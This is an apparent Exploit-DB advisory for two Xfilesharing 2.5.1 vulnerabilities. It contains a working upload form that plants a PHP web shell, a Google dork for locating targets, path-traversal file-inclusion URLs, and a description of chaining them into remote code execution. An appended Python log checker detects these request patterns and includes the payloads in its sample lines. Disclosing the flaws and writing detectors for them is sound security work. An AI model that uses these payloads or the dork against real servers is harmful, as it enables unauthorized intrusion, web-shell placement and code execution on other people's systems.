Xfilesharing 2.5.1 - Arbitrary File Upload

Published: 14 Nov 2019 00:00:00
Reported by: Noman Riffat
Type: exploitdb
Source: www.exploit-db.com
Views: 459

Xfilesharing 2.5.1 Arbitrary File Upload and Local File Inclusion

# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952

#####################
Arbitrary File Upload
#####################

<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
    <input type="text" name="sid" value="joe">
    <input type="file" name="file">
    <input type="submit" value="Upload" name="submit">
</form>

Shell : http://xyz.com/cgi-bin/temp/joe/shell.php

####################
Local File Inclusion
####################

http://xyz.com/?op=page&tmpl=../../admin_settings

This URL fetches the "admin_settings.html" template without any authentication. The ".html" extension is hard-coded on the server, so the included file must have an html extension, but it can be anywhere on the server. You can even combine the LFI with the Arbitrary File Upload vulnerability by uploading an html file, e.g. "upload.html", and changing the "sid" to "../../../../../../tmp", so that the file gets uploaded to the tmp directory of the server. You can then include the file as follows.

http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload

The Xfilesharing script has built-in shortcodes as well, so you can achieve RCE by including them in that "upload.html" file.

Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
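
A defender's view of the two request patterns above, as an added example that is not part of the original advisory or of Xfilesharing: a Python check over web access logs that flags `op=page` requests whose `tmpl` value contains traversal (including double percent-encoding) and requests for script files under `/cgi-bin/temp/`. The combined log format, the script-extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: extensions the web server could execute from the upload temp dir.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|cgi|pl|py|sh)$", re.IGNORECASE)
TEMP_PREFIX = "/cgi-bin/temp/"  # upload temp path named in the advisory

def fully_unquote(value, max_rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .) a bounded number of times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the findings for one access-log line (empty list if none)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    findings = []
    parts = urlsplit(match["target"])
    query = parse_qs(parts.query, keep_blank_values=True)
    # LFI pattern: op=page whose tmpl value climbs out of the template directory.
    if "page" in query.get("op", []):
        for raw in query.get("tmpl", []):
            tmpl = fully_unquote(raw).replace("\\", "/")
            if ".." in tmpl.split("/") or tmpl.startswith("/"):
                findings.append("tmpl-traversal")
    # Upload follow-up: a script being requested from the temp upload directory.
    path = fully_unquote(parts.path)
    if path.startswith(TEMP_PREFIX) and SCRIPT_EXT_RE.search(path):
        findings.append("temp-script-request")
    return findings

# Constructed sample lines (documentation IP range, hypothetical "faq" template).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Nov/2019:10:00:01 +0000] "GET /?op=page&tmpl=faq HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Nov/2019:10:00:05 +0000] "GET /?op=page&tmpl=../../admin_settings HTTP/1.1" 200 9001',
    '203.0.113.7 - - [14/Nov/2019:10:00:09 +0000] "GET /?op=page&tmpl=%252e%252e%252fadmin_settings HTTP/1.1" 200 9001',
    '203.0.113.7 - - [14/Nov/2019:10:00:12 +0000] "GET /cgi-bin/temp/joe/shell.php HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line)
```

The `sid` field travels in the multipart POST body to `up.cgi`, so it does not appear in access logs; checking it for path separators needs a WAF rule or request-body logging.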

Scores (14 Nov 2019 00:00, current):
Vulners AI Score: 8.9 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.84694